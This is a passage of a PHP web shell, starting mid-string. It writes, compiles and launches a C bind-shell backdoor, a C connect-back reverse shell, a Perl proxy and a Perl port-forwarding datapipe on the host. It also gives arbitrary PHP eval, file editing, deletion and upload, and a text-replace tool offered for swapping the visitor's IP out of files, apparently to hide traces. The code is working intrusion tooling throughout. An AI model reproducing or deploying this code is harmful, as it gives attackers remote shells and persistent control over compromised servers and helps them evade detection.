Nvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
if(is_writable("/tmp")){
$fp=fopen("/tmp/PnP_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl /tmp/PnP_perl_proxy.pl $port &");
unlink("/tmp/PnP_perl_proxy.pl");
}else{
if(is_writable(".")){
mkdir(".PnP_proxy_tmp");
$fp=fopen(".PnP_proxy_tmp/PnP_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl .PnP_proxy_tmp/PnP_perl_proxy.pl $port &");
unlink(".PnP_proxy_tmp/PnP_perl_proxy.pl");
rmdir(".PnP_proxy_tmp");
}
}
$show_ps="1";
}
if($_POST['c_bd']){
$port=$_POST['port'];
$c_bd_scp = "#define PORT $port
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl(\"/bin/sh\",\"sh\",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
";
if(is_writable("/tmp")){
$fp=fopen("/tmp/PnP_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc /tmp/PnP_c_bd.c -o /tmp/PnP_bd");
passthru("nohup /tmp/PnP_bd &");
unlink("/tmp/PnP_c_bd.c");
unlink("/tmp/PnP_bd");
}else{
if(is_writable(".")){
mkdir(".PnP_bd_tmp");
$fp=fopen(".PnP_bd_tmp/PnP_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc .PnP_bd_tmp/PnP_c_bd.c -o .PnP_bd_tmp/PnP_bd");
passthru("nohup .PnP_bd_tmp/PnP_bd &");
unlink(".PnP_bd_tmp/PnP_bd");
unlink(".PnP_bd_tmp/PnP_c_bd.c");
rmdir(".PnP_bd_tmp");
}
}
$show_ps="1";
}#end of c bd
if($_POST['bc_c']){ # nc -l -p 4500
$port_c = $_POST['port_c'];
$ip=$_POST['ip'];
$bc_c_scp = "#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = $port_c;
struct sockaddr_in addr;
char mesg[] = \"::Connect-Back Backdoor:: CMD: \";
char shell[] = \"/bin/sh\";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, \" %s <ip> \", argv[0]);
exit(0); }
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, \"in.telnetd\", 0);
close(fd);
return 1;
}
";
if(is_writable("/tmp")){
if(file_exists("/tmp/PnP_c_bc_c.c")){unlink("/tmp/PnP_c_bc_c.c");}
if(file_exists("/tmp/PnP_c_bc_c.c")){unlink("/tmp/PnP_c_bc");}
$fp=fopen("/tmp/PnP_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc /tmp/PnP_c_bc_c.c -o /tmp/PnP_bc_c");
passthru("nohup /tmp/PnP_bc_c $ip &");
unlink("/tmp/PnP_bc_c");
unlink("/tmp/PnP_bc_c.c");
}else{
if(is_writable(".")){
mkdir(".PnP_bc_c_tmp");
$fp=fopen(".PnP_bc_c_tmp/PnP_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc .PnP_bc_c_tmp/PnP_c_bc_c.c -o .PnP_bc_c_tmp/PnP_bc_c");
passthru("nohup .PnP_bc_c_tmp/PnP_bc_c $ip &");
unlink(".PnP_bc_c_tmp/PnP_bc_c.c");
unlink(".PnP_bc_c_tmp/PnP_bc_c");
rmdir(".PnP_bc_c_tmp");
}
}
$show_ps="1";
}if($_POST['datapipe_pl']){
$port_2=$_POST['port_2'];
$port_3=$_POST['port_3'];
$ip=$_POST['ip'];
$datapipe_pl = "
#!/usr/bin/perl
# coded by CuTTer (rus hacker)
use IO::Socket;
use POSIX;
\$localport=$port_2;
\$host=\"$ip\";
\$port=$port_3;
\$daemon=1;
\$DIR = undef;
## ???????? ??? ??????? (1-??, 0-???)
\$log=0;
\$| = 1;
if (\$daemon){
print \"3anycKaeM daemon\n\";
\$pid = fork;
exit if \$pid;
die \"Couldn't fork: \$!\" unless defined(\$pid);
POSIX::setsid() or die \"Can't start a new session: \$!\";
}
%o = ('port' => \$localport,
'toport' => \$port,
'tohost' => \$host);
\$ah = IO::Socket::INET->new(
'LocalPort' => \$localport,
'Reuse' => 1,
'Listen' => 10)
|| die \"?????? ??????? ????? ??? ??????????: \$!\";
print \"???????? ?????????? ?????.\n\" if \$log;
\$SIG{'CHLD'} = 'IGNORE';
\$num = 0;
while (1) {
\$ch = \$ah->accept();
if (!\$ch) {
print STDERR \"???????? ????????? accept: \$!\n\";
next;
}
printf(\"????? ??????: host %s, port %s.\n\",
\$ch->peerhost(), \$ch->peerport()) if \$log;
++\$num;
\$pid = fork();
if (!defined(\$pid)) {
print STDERR \"?????????? ????????? fork: \$!\n\";
} elsif (\$pid == 0) {
\$ah->close();
Run(\%o, \$ch, \$num);
} else {
print \"Parent: Fork ?????? ???????, ????????? ?????.\n\" if \$log;
\$ch->close();
}
}
sub Run {
my(\$o, \$ch, \$num) = @_;
my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
'PeerPort' => \$o->{'toport'});
print(\"Child: ?????? ???????? ?? \$o->{'tohost'}, ???? \$o->{'toport'}.\n\") if \$log;
if (!\$th) {
printf STDERR (\"Child: ??????? ???????? ?? %s, ???? %s.\n\",
\$o->{'tohost'}, \$o->{'toport'});
exit 0;
}
my \$fh;
if (\$o->{'dir'}) {
\$fh = Symbol::gensym();
open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
or die \"Child: ???????? ???????? ??? ????? \$o->{'dir'}/tunnel\$num.log: \$!\";
}
\$ch->autoflush();
\$th->autoflush();
while (\$ch || \$th) {
print \"Child: ???????? ????.\n\" if \$log;
my \$rin = \"\";
vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
vec(\$rin, fileno(\$th), 1) = 1 if \$th;
my(\$rout, \$eout);
select(\$rout = \$rin, undef, \$eout = \$rin, 120);
if (!\$rout && !\$eout) {
print STDERR \"Child: ?????? Timeout.\n\";
}
my \$cbuffer = \"\";
my \$tbuffer = \"\";
if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
print \"Child: ???? ?????? ?? ???????.\n\" if \$log;
my \$result = sysread(\$ch, \$tbuffer, 1024);
if (!defined(\$result)) {
print STDERR \"Child: ?????? ??? ?????????? ?????? ???????: \$!\n\";
exit 0;
}
if (\$result == 0) {
print \"Child: ?????? ????????????.\n\" if \$log;
exit 0;
}
print \"Child: ??????: \$cbuffer\n\" if \$log;
}
if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) {
print \"Child: ???? ??????.\n\" if \$log;
my \$result = sysread(\$th, \$cbuffer, 1024);
if (!defined(\$result)) {
print STDERR \"Child: ?????????? ??????? ??????: \$!\n\";
exit 0;
}
if (\$result == 0) {
print \"Child: ????????? ????????????.\n\" if \$log;
exit 0;
}
print \"Child: ??????: \$cbuffer\n\" if \$log;
}
if (\$fh && \$tbuffer) {
(print \$fh \$tbuffer);
}
while (my \$len = length(\$tbuffer)) {
print \"Child: ?????????? \$len ????.\n\" if \$log;
my \$res = syswrite(\$th, \$tbuffer, \$len);
print \"Child: ?????? ??????????.\n\" if \$log;
if (\$res > 0) {
\$tbuffer = substr(\$tbuffer, \$res);
} else {
print STDERR \"Child: ?????????? ????????? ??????: \$!\n\";
}
}
while (my \$len = length(\$cbuffer)) {
print \"Child: ?????????? \$len ???? ???????.\n\" if \$log;
my \$res = syswrite(\$ch, \$cbuffer, \$len);
print \"Child: ?????? ??????????..\n\" if \$log;
if (\$res > 0) {
\$cbuffer = substr(\$cbuffer, \$res);
} else {
print STDERR \"Child: ?????????? ????????? ??????: \$!\n\";
}
}
}
}
";
if(is_writable("/tmp")){
$fp=fopen("/tmp/PnP_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("nohup perl /tmp/PnP_perl_datapipe.pl &");
unlink("/tmp/PnP_perl_datapipe.pl");
}else{
if(is_writable(".")){
mkdir(".PnP_datapipe_tmp");
$fp=fopen(".PnP_datapipe_tmp/PnP_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("nohup perl .PnP_datapipe_tmp/PnP_perl_datapipe.pl &");
unlink(".PnP_datapipe_tmp/PnP_perl_datapipe.pl");
rmdir(".PnP_datapipe_tmp");
}
}
$show_ps="1";
}
if($show_ps=="1"){
print "<center><b>[ps ux]</b></center><br><br>";
print "<pre>";
passthru("ps ux");
print "</pre><br><br>";
}
print "
<b>eval:</b<br>
(example: print \"Hello World\";)
<form method=post>
<font color=red><b><?</b><br>
<textarea name=eval rows=15 cols=113></textarea><br>
<b>?></b></font><br>
<input type=submit value=Run style='width:150px;'>
</form><br>
";
function eval_sl($editf){
if(get_magic_quotes_gpc()==1){
$editf=stripslashes($editf);
}
return $editf;
}
if($_POST['eval']){
print "<b>RESULT:<br><br></b>";
eval(eval_sl($_POST['eval']));
print "<br><br>";
print "<font color=green><b>PHP:</b><br>\r\n\r\n";
print "<?\r\n";
print "<br>";
print htmlspecialchars(eval_sl(($_POST['eval'])));
print "<br>";
print "?>\r\n\r\n</font><br><br>";
}
echo $copyr;
exit;}
if(@$_GET['replace']=="1"){
$ip=@$_SERVER['REMOTE_ADDR'];
$d=$_GET['d'];
$e=$_GET['e'];
@$de=$d."/".$e;
$de=str_replace("//","/",$de);
$e=@$e;
echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
echo "
Replace tool:<br>
(You can replace any text)<br>
File: $de<br>
<form method=post>
1. Your ip.<br>
2. microsoft.com ip :)<br>
Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=192.168.6.1>
<input type=submit name=doit value=Replace>
</form>
";
if(@$_POST['doit']){
@$thisX=$_POST['thisX'];
@$bythis=$_POST['bythis'];
@$e=$_GET['e'];
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$rpl = @fread ($fd, @filesize ($filename));
$re=str_replace("$thisX","$bythis",$rpl);
$x=@fopen("$d/$e","w");
@fwrite($x,"$re");
echo "<br><center>$thisX Replaced by $bythis<br>
[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
}
echo $copyr;
exit;}
if(@$_GET['t']=="upload"){
echo "<br>
<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
File upload:<br>
<form enctype=\"multipart/form-data\" method=post>
<input type=file name=text size=50><br>
<input name=where size=52 value='$d'><br>
New file name:<br>
<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
<input type=submit value=Upload name=uploadf>
</form><br>
";
if(@$_POST['uploadf']){
$where=$_POST['where'];
$newf=$_POST['newf'];
$where=str_replace("//","/",$where);
if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
$uploadfile = "$where/".$newf;
if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
$uploadfile=str_replace("//","/",$uploadfile);
echo "<i><br>Uploaded to $uploadfile</i><br>";
}else{
echo "<i><br>Error</i><br>";}
}
}
if(@$_GET['t']=="massupload"){
echo "
Mass upload:<br>
<form enctype=\"multipart/form-data\" method=post>
<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
<input name=where size=43 value='$d'><br>
<input type=submit value=Upload name=massupload>
</form><br>";
if(@$_POST['massupload']){
$where=@$_POST['where'];
$uploadfile1 = "$where/".@$_FILES['text1']['name'];
$uploadfile2 = "$where/".@$_FILES['text2']['name'];
$uploadfile3 = "$where/".@$_FILES['text3']['name'];
$uploadfile4 = "$where/".@$_FILES['text4']['name'];
$uploadfile5 = "$where/".@$_FILES['text5']['name'];
$uploadfile6 = "$where/".@$_FILES['text6']['name'];
$uploadfile7 = "$where/".@$_FILES['text7']['name'];
$uploadfile8 = "$where/".@$_FILES['text8']['name'];
$uploadfile9 = "$where/".@$_FILES['text9']['name'];
$uploadfile10 = "$where/".@$_FILES['text10']['name'];
$uploadfile11 = "$where/".@$_FILES['text11']['name'];
$uploadfile12 = "$where/".@$_FILES['text12']['name'];
$uploadfile13 = "$where/".@$_FILES['text13']['name'];
$uploadfile14 = "$where/".@$_FILES['text14']['name'];
$uploadfile15 = "$where/".@$_FILES['text15']['name'];
$uploadfile16 = "$where/".@$_FILES['text16']['name'];
$uploadfile17 = "$where/".@$_FILES['text17']['name'];
$uploadfile18 = "$where/".@$_FILES['text18']['name'];
$uploadfile19 = "$where/".@$_FILES['text19']['name'];
$uploadfile20 = "$where/".@$_FILES['text20']['name'];
if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile1</i><br>";}
if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile2</i><br>";}
if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile3</i><br>";}
if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile4</i><br>";}
if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile5</i><br>";}
if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile6</i><br>";}
if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile7</i><br>";}
if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile8</i><br>";}
if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile9</i><br>";}
if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile10</i><br>";}
if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile11</i><br>";}
if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile12</i><br>";}
if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile13</i><br>";}
if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile14</i><br>";}
if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile15</i><br>";}
if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile16</i><br>";}
if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile17</i><br>";}
if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile18</i><br>";}
if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile19</i><br>";}
if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
$where=str_replace("\\\\","\\",$where);
echo "<i>Uploaded to $uploadfile20</i><br>";}
}
echo $copyr;
exit;}
if(@$_GET['yes']=="yes"){
$d=@$_GET['d']; $e=@$_GET['e'];
unlink($d."/".$e);
$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
}
if(@$_GET['clean']=="1"){
@$e=$_GET['e'];
$x=fopen("$d/$e","w");
fwrite($x,"");
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
exit;
}
if(@$_GET['e']){
$d=@$_GET['d'];
$e=@$_GET['e'];
$pinf=pathinfo($e);
if(in_array(".".@$pinf['extension'],$images)){
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
exit;}
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$e;
$de=str_replace("//","/",$de);
if(is_file($de)){
if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
echo "
File contents:<br>
$de
<br>
<table width=100% border=1 cellpadding=0 cellspacing=0>
<tr><td><pre>
$c
</pre></td></tr>
</table>
";
if(@$_GET['delete']=="1"){
$delete=$_GET['delete'];
echo "
DELETE: Are you sure?<br>
<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
<br>
";
if(@$_GET['yes']=="yes"){
@$d=$_GET['d']; @$e=$_GET['e'];
echo $delresult;
}
if(@$_GET['no']){
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
";
}
}
echo $copyr;
exit;
}
if(@$_GET['edit']=="1"){
@$d=$_GET['d'];
@$ef=$_GET['ef'];
$e=$ef;
if(is_file($d."/".$ef)){
if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
$filename="$d/$ef";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$ef;
$de=str_replace("//","/",$de);
echo "
Edit:<br>
$de<br>";
if(!@$_POST['save']){
print "
<form method=post>
<input name=filename value='$d/$ef'>
<textarea cols=143 rows=30 name=editf>$c</textarea>
<br>
<input type=submit name=save value='Save changes'></form><br>
";
}
if(@$_POST['save']){
$editf=@$_POST['editf'];
if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
$editf=stripslashes($editf);
}
$f=fopen($filename,"w+");
fwrite($f,"$editf");
echo "<br>
<b>File edited.</b>
<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
exit;
}
echo $copyr;
exit;
}
echo"
<table width=100% cellpadding=1 cellspacing=0 class=hack>
<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
";
$dirs=array();
$files=array();
$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
while (!(($file = readdir($dh)) === false)) {
if ($file=="." || $file=="..") continue;
if (@is_dir("$d/$file")) {
$dirs[]=$file;
}else{
$files[]=$file;
}
sort($dirs);
sort($files);
$fz=@filesize("$d/$file");
}
function perm($perms){
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
for($i=0; $i<count($dirs); $i++){
$perms = @fileperms($d."/".$dirs[$i]);
$owner = @fileowner($d."/".$dirs[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$dirs[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$info=perm($perms);
if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
$linkd=str_replace("//","/",$linkd);
echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color> </td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
}
for($i=0; $i<count($files); $i++){
$size=@filesize($d."/".$files[$i]);
$perms = @fileperms($d."/".$files[$i]);
$owner = @fileowner($d."/".$files[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$files[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$info=perm($perms);
if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
if ($size < 1024){$siz=$size.' b';
}else{
if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
}}}
echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
}
echo "</table></td></tr></table>";
?>